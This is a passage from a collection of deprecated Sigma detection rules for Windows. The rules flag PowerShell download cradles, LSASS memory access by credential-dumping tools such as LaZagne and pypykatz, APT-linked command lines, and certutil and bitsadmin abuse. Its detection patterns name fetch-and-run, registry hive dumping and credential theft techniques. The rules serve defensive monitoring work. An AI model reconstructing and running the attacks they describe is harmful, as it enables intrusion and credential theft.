- 'new-object'
- 'system.net.webclient'
- '.download'
selection_iex_webclient:
'|all':
- 'iex'
- 'New-Object'
- 'Net.WebClient'
- '.Download'
filter_chocolatey:
- "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1"
- "(New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1')"
- 'Write-ChocolateyWarning'
condition: 1 of selection_* and not 1 of filter_*
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/powershell_syncappvpublishingserver_exe.yml
================================================
title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction
id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299
related:
- id: fde7929d-8beb-4a4c-b922-be9974671667
type: derived
description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.
references:
- https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/
author: 'Ensar Şamil, @sblmsrsn, OSCD Community'
date: 2020/10/05
modified: 2022/04/11
tags:
- attack.defense_evasion
- attack.t1218
logsource:
product: windows
service: powershell
detection:
selection:
- 'SyncAppvPublishingServer.exe'
condition: selection
falsepositives:
- App-V clients
level: medium
status: deprecated
================================================
FILE: deprecated/windows/proc_access_win_in_memory_assembly_execution.yml
================================================
title: Suspicious In-Memory Module Execution
id: 5f113a8f-8b61-41ca-b90f-d374fa7e4a39
status: deprecated
description: |
Detects the access to processes by other suspicious processes which have reflectively loaded libraries in their memory space.
An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID 10 cannot reference a stack call to a dll loaded from disk (the standard way),
it will display "UNKNOWN" as the module name. Usually this means the stack call points to a module that was reflectively loaded in memory.
Adding to this, it is not common to see such few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown) which essentially means that
most of the functions required by the process to execute certain routines are already present in memory, not requiring any calls to external libraries.
The latter should also be considered suspicious.
references:
- https://azure.microsoft.com/en-ca/blog/detecting-in-memory-attacks-with-sysmon-and-azure-security-center/
author: Perez Diego (@darkquassar), oscd.community, Jonhnathan Ribeiro
date: 2019/10/27
modified: 2022/11/17
tags:
- attack.privilege_escalation
- attack.defense_evasion
- attack.t1055.001
- attack.t1055.002
logsource:
category: process_access
product: windows
detection:
selection1:
CallTrace|contains|all:
- 'C:\WINDOWS\SYSTEM32\ntdll.dll+'
- '|C:\WINDOWS\System32\KERNELBASE.dll+'
- '|UNKNOWN('
- ')'
selection2:
CallTrace|contains|all:
- 'UNKNOWN('
- ')|UNKNOWN('
CallTrace|endswith: ')'
selection3:
CallTrace|contains: 'UNKNOWN'
GrantedAccess:
- '0x1F0FFF'
- '0x1F1FFF'
- '0x143A'
- '0x1410'
- '0x1010'
- '0x1F2FFF'
- '0x1F3FFF'
- '0x1FFFFF'
filter:
- SourceImage|endswith:
- '\Windows\System32\sdiagnhost.exe'
- '\procexp64.exe'
- '\procexp.exe'
- '\Microsoft VS Code\Code.exe'
- '\aurora-agent-64.exe'
- '\aurora-agent.exe'
- '\git\usr\bin\sh.exe'
- '\IDE\devenv.exe'
- '\GitHubDesktop\Update.exe'
- '\RuntimeBroker.exe'
- '\backgroundTaskHost.exe'
- '\GitHubDesktop.exe'
- SourceImage|startswith:
- 'C:\Program Files (x86)\'
- 'C:\Program Files\'
- 'C:\Windows\Microsoft.NET\Framework\\*\NGenTask.exe'
- 'C:\Program Files (x86)\Microsoft Visual Studio\'
- 'C:\Program Files\Microsoft Visual Studio\'
- 'C:\Windows\Microsoft.NET\Framework'
- 'C:\WINDOWS\System32\DriverStore\'
- 'C:\Windows\System32\WindowsPowerShell\'
- SourceImage:
- 'C:\WINDOWS\system32\taskhostw.exe'
- 'C:\WINDOWS\system32\ctfmon.exe'
- 'C:\WINDOWS\system32\NhNotifSys.exe'
- 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe'
- 'C:\Windows\explorer.exe'
- TargetImage: 'C:\Windows\System32\RuntimeBroker.exe'
- TargetImage|endswith: '\Microsoft VS Code\Code.exe'
- CallTrace|contains: '|C:\WINDOWS\System32\RPCRT4.dll+' # attempt to save the rule with a broader filter
filter_set_1:
SourceImage: 'C:\WINDOWS\Explorer.EXE'
TargetImage:
- 'C:\WINDOWS\system32\backgroundTaskHost.exe'
- 'C:\WINDOWS\explorer.exe'
filter_msmpeng:
SourceImage|startswith: 'C:\ProgramData\Microsoft\Windows Defender\Platform\'
SourceImage|endswith: '\MsMpEng.exe'
filter_eclipse:
SourceImage|endswith: '\eclipse.exe'
CallTrace|contains:
- '\jre\bin\java.dll'
- '|C:\Windows\SYSTEM32\windows.storage.dll+'
- '\configuration\org.eclipse.osgi\'
filter_openwith:
SourceImage: 'C:\Windows\system32\OpenWith.exe'
TargetImage: 'C:\Windows\Explorer.EXE'
filter_teams:
SourceImage|startswith: 'C:\Users\'
SourceImage|endswith: '\AppData\Local\Microsoft\Teams\current\Teams.exe'
TargetImage|endswith:
- ':\Windows\Explorer.EXE'
- '\AppData\Local\Microsoft\Teams\Update.exe'
- '\AppData\Local\Microsoft\Teams\current\Teams.exe'
- '\MsMpEng.exe'
filter_wwahost:
SourceImage: 'C:\Windows\System32\WWAHost.exe'
TargetImage: 'C:\Windows\System32\svchost.exe'
filter_sppsvc:
SourceImage: C:\WINDOWS\system32\sppsvc.exe
TargetImage: C:\WINDOWS\system32\SppExtComObj.exe
condition: 1 of selection* and not 1 of filter*
fields:
- ComputerName
- User
- SourceImage
- TargetImage
- CallTrace
falsepositives:
- SysInternals Process Explorer
level: low
================================================
FILE: deprecated/windows/proc_access_win_lazagne_cred_dump_lsass_access.yml
================================================
title: Credential Dumping by LaZagne
id: 4b9a8556-99c4-470b-a40c-9c8d02c77ed0
status: stable
description: Detects LSASS process access by LaZagne for credential dumping.
references:
- https://twitter.com/bh4b3sh/status/1303674603819081728
author: Bhabesh Raj, Jonhnathan Ribeiro
date: 2020/09/09
modified: 2022/08/13
tags:
- attack.credential_access
- attack.t1003.001
- attack.s0349
logsource:
category: process_access
product: windows
detection:
selection:
TargetImage|endswith: '\lsass.exe'
CallTrace|contains|all:
- 'C:\Windows\SYSTEM32\ntdll.dll+'
- '|C:\Windows\System32\KERNELBASE.dll+'
- '_ctypes.pyd+'
- 'python27.dll+'
GrantedAccess: '0x1FFFFF'
condition: selection
falsepositives:
- Unknown
level: critical
================================================
FILE: deprecated/windows/proc_access_win_lsass_susp_access.yml
================================================
title: Credential Dumping Tools Accessing LSASS Memory
id: 32d0d3e2-e58d-4d41-926b-18b520b2b32d
status: deprecated
description: Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools
references:
- https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow
- https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html
- https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
- https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf
author: Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community
date: 2017/02/16
modified: 2023/11/30
tags:
- attack.credential_access
- attack.t1003.001
- attack.s0002
- car.2019-04-004
logsource:
category: process_access
product: windows
detection:
selection:
TargetImage|endswith: '\lsass.exe'
GrantedAccess|startswith:
- '0x40'
# - '0x1000' # minimum access requirements to query basic info from service
# - '0x1400'
- '0x100000'
- '0x1410' # car.2019-04-004
# - '0x1010' # car.2019-04-004
- '0x1438' # car.2019-04-004
- '0x143a' # car.2019-04-004
- '0x1418' # car.2019-04-004
- '0x1f0fff'
- '0x1f1fff'
- '0x1f2fff'
- '0x1f3fff'
filter_exact:
SourceImage:
- 'C:\WINDOWS\system32\taskmgr.exe'
- 'C:\Windows\System32\perfmon.exe'
filter_generic:
SourceImage|startswith:
- 'C:\Program Files\'
- 'C:\Program Files (x86)\'
GrantedAccess:
- '0x1410'
- '0x410'
filter_defender:
SourceImage|startswith:
- 'C:\ProgramData\Microsoft\Windows Defender\'
- 'C:\Program Files\Windows Defender\'
- 'C:\Program Files\Microsoft Security Client\MsMpEng.exe' # Windows7
SourceImage|endswith: '\MsMpEng.exe'
filter_defender_updates:
SourceImage: 'C:\Windows\System32\svchost.exe'
CallTrace|contains|all:
- '|C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{'
- '}\mpengine.dll+'
GrantedAccess: '0x1418'
filter_defender_calltrace:
CallTrace|contains:
- '|c:\program files\windows defender\mprtp.dll'
- '|c:\program files\windows defender\MpClient.dll'
filter_gaming_services:
SourceImage|startswith: 'C:\Program Files\WindowsApps\'
SourceImage|endswith: '\GamingServices.exe'
GrantedAccess:
- '0x1410'
- '0x410'
filter_specific_granted_access_1:
SourceImage|endswith:
- '\PROCEXP64.EXE'
- '\PROCEXP.EXE'
- 'C:\WINDOWS\system32\taskhostw.exe'
- '\MBAMInstallerService.exe'
GrantedAccess:
- '0x1410'
- '0x410'
- '0x40'
filter_specific_granted_access_2:
SourceImage:
- 'C:\WINDOWS\system32\wbem\wmiprvse.exe'
- 'C:\Windows\syswow64\MsiExec.exe'
- 'C:\Windows\System32\msiexec.exe'
GrantedAccess:
- '0x1410'
- '0x410'
- '0x1f1fff'
- '0x1f3fff'
filter_specific_granted_access_3:
SourceImage:
- 'C:\Windows\system32\wininit.exe'
- 'C:\Windows\System32\lsass.exe'
GrantedAccess: '0x1000000'
filter_vmwaretools:
SourceImage|startswith: 'C:\ProgramData\VMware\VMware Tools\'
SourceImage|endswith: '\vmtoolsd.exe'
filter_svchost:
SourceImage: 'C:\WINDOWS\system32\svchost.exe'
GrantedAccess:
- '0x100000'
- '0x1410'
filter_nextron:
SourceImage|endswith:
- '\thor.exe'
- '\thor64.exe'
- '\aurora-agent.exe'
- '\aurora-agent-64.exe'
GrantedAccess:
- '0x40'
- '0x1010'
filter_explorer:
SourceImage|endswith: '\explorer.exe'
GrantedAccess: '0x401'
filter_mrt:
SourceImage: 'C:\Windows\system32\MRT.exe' # Windows Malicious Software Removal Tool
GrantedAccess:
- '0x1410'
- '0x1418'
filter_handle:
GrantedAccess: '0x40'
SourceImage|endswith:
- '\handle.exe'
- '\handle64.exe'
filter_edge: # version in path 96.0.1054.43
SourceImage|startswith: 'C:\Program Files (x86)\Microsoft\Edge\Application\'
SourceImage|endswith: '\Installer\setup.exe'
filter_webex:
SourceImage|endswith: '\AppData\Local\WebEx\WebexHost.exe'
GrantedAccess: '0x401'
filter_malwarebytes:
SourceImage: 'C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\ctlrupdate\mbupdatr.exe'
GrantedAccess: '0x1410'
filter_dropbox:
SourceImage|contains:
- ':\Windows\Temp\'
- '\AppData\Local\Temp\'
SourceImage|endswith: '.tmp\DropboxUpdate.exe'
GrantedAccess:
- '0x410'
- '0x1410'
filter_msbuild:
# This FP was generated while building CPython from source and could be related to other similar examples.
# But if you don't do that kind of stuff consider removing it from the rule ;)
SourceImage|startswith: 'C:\Program Files\Microsoft Visual Studio\'
SourceImage|endswith: '\MSBuild\Current\Bin\MSBuild.exe'
GrantedAccess: '0x1F3FFF'
# Old - too broad filter
# SourceImage|endswith: # easy to bypass. need to implement supportive rule to detect bypass attempts
# - '\wmiprvse.exe'
# - '\taskmgr.exe'
# - '\procexp64.exe'
# - '\procexp.exe'
# - '\lsm.exe'
# - '\MsMpEng.exe'
# - '\csrss.exe'
# - '\wininit.exe'
# - '\vmtoolsd.exe'
filter_games:
SourceImage|contains: '\SteamLibrary\steamapps\'
condition: selection and not 1 of filter_*
fields:
- ComputerName
- User
- SourceImage
falsepositives:
- Likely
level: high
================================================
FILE: deprecated/windows/proc_access_win_pypykatz_cred_dump_lsass_access.yml
================================================
title: Credential Dumping by Pypykatz
id: 7186e989-4ed7-4f4e-a656-4674b9e3e48b
status: test
description: Detects LSASS process access by pypykatz for credential dumping.
references:
- https://github.com/skelsec/pypykatz
author: Bhabesh Raj
date: 2021/08/03
modified: 2022/10/09
tags:
- attack.credential_access
- attack.t1003.001
logsource:
category: process_access
product: windows
detection:
selection:
TargetImage|endswith: '\lsass.exe'
CallTrace|contains|all:
- 'C:\Windows\SYSTEM32\ntdll.dll+'
- 'C:\Windows\System32\KERNELBASE.dll+'
- 'libffi-7.dll'
- '_ctypes.pyd+'
- 'python3*.dll+' # Pypy requires python>=3.6
GrantedAccess: '0x1FFFFF'
condition: selection
falsepositives:
- Unknown
level: critical
================================================
FILE: deprecated/windows/proc_access_win_susp_invoke_patchingapi.yml
================================================
title: Potential NT API Stub Patching
id: b916cba1-b38a-42da-9223-17114d846fd6
status: deprecated
description: Detects potential NT API stub patching as seen used by the project PatchingAPI
references:
- https://web.archive.org/web/20230106211702/https://github.com/D1rkMtr/UnhookingPatch
- https://twitter.com/D1rkMtr/status/1611471891193298944?s=20
author: frack113
date: 2023/01/07
modified: 2024/05/27
tags:
- attack.defense_evasion
- attack.t1562.002
logsource:
category: process_access
product: windows
detection:
selection:
GrantedAccess: '0x1FFFFF'
CallTrace|startswith: 'C:\Windows\SYSTEM32\ntdll.dll+'
CallTrace|contains: '|UNKNOWN('
CallTrace|endswith: ')'
filter_main_generic:
# To avoid FP with installed applications. This filter assumes that if an application is located here. The attacker has already achieved admin rights
- SourceImage|contains:
- ':\Program Files\'
- ':\Program Files (x86)\'
- ':\Windows\System32\'
- ':\Windows\SysWOW64\'
- TargetImage|contains:
- ':\Program Files\'
- ':\Program Files (x86)\'
- ':\Windows\System32\'
- ':\Windows\SysWOW64\'
filter_optional_thor:
SourceImage|endswith:
- '\thor.exe'
- '\thor64.exe'
filter_optional_githubdesktop:
SourceImage|contains|all:
- ':\Users\'
- '\AppData\Local\GitHubDesktop\app-'
SourceImage|endswith:
- '\GitHubDesktop.exe'
- '\resources\app\git\usr\bin\sh.exe'
TargetImage|contains|all:
- ':\Users\'
- '\AppData\Local\GitHubDesktop\app-'
filter_main_dotnet:
SourceImage|contains: ':\Windows\Microsoft.NET\'
TargetImage|contains: ':\Windows\Microsoft.NET\'
filter_main_taskhost:
SourceImage|contains:
- ':\Windows\system32\taskhostw.exe'
- ':\Windows\system32\taskhost.exe'
TargetImage|contains:
- ':\Windows\Microsoft.NET\Framework\v'
- ':\Windows\Microsoft.NET\Framework64\v'
TargetImage|endswith: '\NGenTask.exe'
filter_optional_teams_to_update:
SourceImage|endswith: '\AppData\Local\Microsoft\Teams\stage\Teams.exe'
TargetImage|endswith: '\AppData\Local\Microsoft\Teams\Update.exe'
filter_optional_teams_update_regsvr32:
SourceImage|endswith: '\AppData\Local\Microsoft\Teams\Update.exe'
TargetImage|endswith: ':\WINDOWS\SysWOW64\regsvr32.exe'
filter_optional_teams_update_to_teams:
SourceImage|endswith: '\AppData\Local\Microsoft\Teams\Update.exe'
TargetImage|endswith: '\AppData\Local\Microsoft\Teams\stage\Teams.exe'
condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_apt_apt29_thinktanks.yml
================================================
title: APT29
id: 033fe7d6-66d1-4240-ac6b-28908009c71f
status: deprecated
description: This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks.
references:
- https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/
- https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html
author: Florian Roth (Nextron Systems)
date: 2018/12/04
modified: 2023/03/08
tags:
- attack.execution
- attack.g0016
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- '-noni'
- '-ep'
- 'bypass'
- '$'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_apt_dragonfly.yml
================================================
title: CrackMapExecWin
id: 04d9079e-3905-4b70-ad37-6bdf11304965
status: deprecated
description: Detects CrackMapExecWin Activity as Described by NCSC
references:
- https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control
- https://attack.mitre.org/software/S0488/
author: Markus Neis
date: 2018/04/08
modified: 2023/03/08
tags:
- attack.g0035
- attack.credential_access
- attack.discovery
- attack.t1110
- attack.t1087
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\crackmapexec.exe'
condition: selection
falsepositives:
- Unknown
level: critical
================================================
FILE: deprecated/windows/proc_creation_win_apt_gallium.yml
================================================
title: GALLIUM Artefacts
id: 18739897-21b1-41da-8ee4-5b786915a676
related:
- id: 440a56bf-7873-4439-940a-1c8a671073c2
type: derived
status: deprecated
description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
references:
- https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/
- https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)
author: Tim Burrell
date: 2020/02/07
modified: 2023/03/09
tags:
- attack.credential_access
- attack.t1212
- attack.command_and_control
- attack.t1071
logsource:
product: windows
category: process_creation
detection:
legitimate_process_path:
Image|contains:
- ':\Program Files(x86)\'
- ':\Program Files\'
legitimate_executable:
Hashes|contains: 'SHA1=e570585edc69f9074cb5e8a790708336bd45ca0f'
condition: legitimate_executable and not legitimate_process_path
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_apt_hurricane_panda.yml
================================================
title: Hurricane Panda Activity
id: 0eb2107b-a596-422e-b123-b389d5594ed7
status: deprecated
description: Detects Hurricane Panda Activity
references:
- https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/
author: Florian Roth (Nextron Systems)
date: 2019/03/04
modified: 2023/03/10
tags:
- attack.privilege_escalation
- attack.g0009
- attack.t1068
logsource:
category: process_creation
product: windows
detection:
selection:
- CommandLine|contains|all:
- 'localgroup'
- 'admin'
- '/add'
- CommandLine|contains: '\Win64.exe'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_apt_lazarus_activity_apr21.yml
================================================
title: Lazarus Activity Apr21
id: 4a12fa47-c735-4032-a214-6fab5b120670
status: deprecated
description: Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity
references:
- https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/
author: Bhabesh Raj
date: 2021/04/20
modified: 2023/03/10
tags:
- attack.g0032
- attack.execution
- attack.t1106
logsource:
category: process_creation
product: windows
detection:
selection_1:
CommandLine|contains|all:
- 'mshta' # Covered by cc7abbd0-762b-41e3-8a26-57ad50d2eea3
- '.zip'
selection_2:
ParentImage: 'C:\Windows\System32\wbem\wmiprvse.exe' # Covered by 8a582fe2-0882-4b89-a82a-da6b2dc32937
Image: 'C:\Windows\System32\mshta.exe'
selection_3:
ParentImage|contains: ':\Users\Public\'
Image: 'C:\Windows\System32\rundll32.exe'
condition: 1 of selection_*
falsepositives:
- Should not be any false positives
level: high
================================================
FILE: deprecated/windows/proc_creation_win_apt_lazarus_loader.yml
================================================
title: Lazarus Loaders
id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e
status: deprecated
description: Detects different loaders as described in various threat reports on Lazarus group activity
references:
- https://www.hvs-consulting.de/lazarus-report/
- https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/
author: Florian Roth (Nextron Systems), wagga
date: 2020/12/23
modified: 2023/03/10
tags:
- attack.g0032
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: windows
detection:
selection_cmd1:
CommandLine|contains|all:
- 'cmd.exe /c '
- ' -p 0x'
selection_cmd2:
CommandLine|contains:
- 'C:\ProgramData\'
- 'C:\RECYCLER\'
selection_rundll1:
CommandLine|contains|all:
- 'rundll32.exe '
- 'C:\ProgramData\'
selection_rundll2:
CommandLine|contains:
- '.bin,'
- '.tmp,'
- '.dat,'
- '.io,'
- '.ini,'
- '.db,'
condition: ( selection_cmd1 and selection_cmd2 ) or ( selection_rundll1 and selection_rundll2 )
falsepositives:
- Unknown
level: critical
================================================
FILE: deprecated/windows/proc_creation_win_apt_muddywater_dnstunnel.yml
================================================
title: DNS Tunnel Technique from MuddyWater
id: 7454df60-1478-484b-810d-bff5d0ba6d4b
status: deprecated
description: Detecting DNS tunnel activity for Muddywater actor
references:
- https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/
- https://www.vmray.com/analyses/5ad401c3a568/report/overview.html
author: '@caliskanfurkan_'
date: 2020/06/04
modified: 2023/03/10
tags:
- attack.command_and_control
- attack.t1071.004
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
ParentImage|endswith: '\excel.exe'
CommandLine|contains: 'DataExchange.dll'
condition: selection
falsepositives:
- Unknown
level: critical
================================================
FILE: deprecated/windows/proc_creation_win_apt_ta505_dropper.yml
================================================
title: TA505 Dropper Load Pattern
id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4
status: deprecated
description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents
references:
- https://twitter.com/ForensicITGuy/status/1334734244120309760
author: Florian Roth (Nextron Systems)
date: 2020/12/08
modified: 2023/04/05
tags:
- attack.execution
- attack.g0092
- attack.t1106
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith: '\wmiprvse.exe'
selection_mshta:
- Image|endswith: '\mshta.exe'
- OriginalFileName: 'mshta.exe'
condition: all of selection_*
falsepositives:
- Unknown
level: critical
================================================
FILE: deprecated/windows/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml
================================================
title: File Download Via Bitsadmin To An Uncommon Target Folder
id: 6e30c82f-a9f8-4aab-b79c-7c12bce6f248
status: deprecated
description: Detects usage of bitsadmin downloading a file to uncommon target folder
references:
- https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin
- https://isc.sans.edu/diary/22264
- https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/
- https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-28
modified: 2025-12-10
tags:
- attack.defense-evasion
- attack.persistence
- attack.t1197
- attack.s0190
- attack.t1036.003
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\bitsadmin.exe'
- OriginalFileName: 'bitsadmin.exe'
selection_flags:
CommandLine|contains:
- ' /transfer '
- ' /create '
- ' /addfile '
selection_folder:
CommandLine|contains:
- '%AppData%'
- '%temp%'
- '%tmp%'
- '\AppData\Local\'
- 'C:\Windows\Temp\'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_certutil_susp_execution.yml
================================================
title: Suspicious Certutil Command Usage
id: e011a729-98a6-4139-b5c4-bf6f6dd8239a
status: deprecated
description: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code
references:
- https://twitter.com/JohnLaTwC/status/835149808817991680
- https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/
- https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/
- https://twitter.com/egre55/status/1087685529016193025
- https://lolbas-project.github.io/lolbas/Binaries/Certutil/
author: Florian Roth (Nextron Systems), juju4, keepwatch
date: 2019/01/16
modified: 2023/02/15
tags:
- attack.defense_evasion
- attack.t1140
- attack.command_and_control
- attack.t1105
- attack.s0160
- attack.g0007
- attack.g0010
- attack.g0045
- attack.g0049
- attack.g0075
- attack.g0096
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\certutil.exe'
- OriginalFileName: 'CertUtil.exe'
selection_cli:
CommandLine|contains:
- ' -decode '
- ' -decodehex '
- ' -urlcache '
- ' -verifyctl '
- ' -encode '
- ' -exportPFX '
- ' /decode '
- ' /decodehex '
- ' /urlcache '
- ' /verifyctl '
- ' /encode '
- ' /exportPFX '
condition: all of selection_*
fields:
- CommandLine
- ParentCommandLine
falsepositives:
- False positives depend on scripts and administrative tools used in the monitored environment
level: high
================================================
FILE: deprecated/windows/proc_creation_win_cmd_read_contents.yml
================================================
title: Read and Execute a File Via Cmd.exe
id: 00a4bacd-6db4-46d5-9258-a7d5ebff4003
status: deprecated
description: Detect use of "/R <" to read and execute a file via cmd.exe
references:
- https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md
author: frack113
date: 2022/08/20
modified: 2023/03/07
tags:
- attack.execution
- attack.t1059.003
logsource:
category: process_creation
product: windows
detection:
selection_cmd:
- OriginalFileName: 'Cmd.Exe'
- Image|endswith: '\cmd.exe'
selection_read:
- ParentCommandLine|contains|all:
- 'cmd'
- '/r '
- '<'
- CommandLine|contains|all:
- 'cmd'
- '/r '
- '<'
condition: all of selection_*
falsepositives:
- Legitimate use
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_cmd_redirect_to_stream.yml
================================================
title: Cmd Stream Redirection
id: 70e68156-6571-427b-a6e9-4476a173a9b6
status: deprecated
description: Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt
author: frack113
date: 2022/02/04
modified: 2023/03/07
tags:
- attack.defense_evasion
- attack.t1564.004
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\cmd.exe'
CommandLine|contains|all:
- '> '
- ':'
filter:
CommandLine|contains: ' :\'
condition: selection and not filter
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_credential_acquisition_registry_hive_dumping.yml
================================================
title: Credential Acquisition via Registry Hive Dumping
id: 4d6c9da1-318b-4edf-bcea-b6c93fa98fd0
status: deprecated
description: Detects Credential Acquisition via Registry Hive Dumping
references:
- https://www.elastic.co/guide/en/security/current/credential-acquisition-via-registry-hive-dumping.html
author: Tim Rauch
date: 2022/10/04
modified: 2023/02/06
tags:
- attack.credential_access
- attack.t1003
logsource:
category: process_creation
product: windows
detection:
selection_1:
- Image|endswith: '\reg.exe'
- OriginalFileName: 'reg.exe'
selection_2:
CommandLine|contains:
- ' save '
- ' export '
selection_3:
CommandLine|contains:
- 'hklm\sam'
- 'hklm\security'
- 'HKEY_LOCAL_MACHINE\SAM'
- 'HKEY_LOCAL_MACHINE\SECURITY'
condition: all of selection_*
level: high
================================================
FILE: deprecated/windows/proc_creation_win_cscript_vbs.yml
================================================
title: Visual Basic Script Execution
id: 23250293-eed5-4c39-b57a-841c8933a57d
status: deprecated
description: Adversaries may abuse Visual Basic (VB) for execution
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.005/T1059.005.md
author: frack113
date: 2022/01/02
modified: 2023/03/06
tags:
- attack.execution
- attack.t1059.005
logsource:
category: process_creation
product: windows
detection:
selection_exe:
- OriginalFileName:
- 'cscript.exe'
- 'wscript.exe'
- Image|endswith:
- '\cscript.exe'
- '\wscript.exe'
selection_script:
CommandLine|contains: '.vbs'
condition: all of selection_*
falsepositives:
- Unknown
level: medium
================================================
FILE: deprecated/windows/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml
================================================
title: Execution via MSSQL Xp_cmdshell Stored Procedure
id: 344482e4-a477-436c-aa70-7536d18a48c7
related:
- id: d08dd86f-681e-4a00-a92c-1db218754417
type: derived
- id: 7f103213-a04e-4d59-8261-213dddf22314
type: derived
status: deprecated
description: Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default.
references:
- https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html
author: Tim Rauch
date: 2022/09/28
modified: 2023/03/06
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\cmd.exe'
- OriginalFileName: 'Cmd.Exe'
selection_parent:
ParentImage|endswith: '\sqlservr.exe'
condition: all of selection_*
falsepositives:
- Unknown
level: high
================================================
FILE: deprecated/windows/proc_creation_win_filefix_browsers.yml
================================================
title: FileFix - Suspicious Child Process from Browser File Upload Abuse
id: 4be03877-d5b6-4520-85c9-a5911c0a656c
status: deprecated
description: |
Detects potentially suspicious subprocesses such as LOLBINs spawned by web browsers. This activity could be associated with the "FileFix" social engineering technique,
where users are tricked into launching the file explorer via a browser-based phishing page and pasting malicious commands into the address bar.
The technique abuses clipboard manipulation and disguises command execution as benign file path access, resulting in covert execution of system utilities.
references:
- https://mrd0x.com/filefix-clickfix-alternative/
author: 0xFustang
date: 2025-06-26
modified: 2025-11-24
tags:
- attack.execution
- attack.t1204.004
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith:
- '\brave.exe'
- '\chrome.exe'
- '\firefox.exe'
- '\msedge.exe'
Image|endswith:
- '\bitsadmin.exe'
- '\certutil.exe'
- '\cmd.exe'
- '\mshta.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\regsvr32.exe'
CommandLine|contains: '#'
condition: selection
falsepositives:
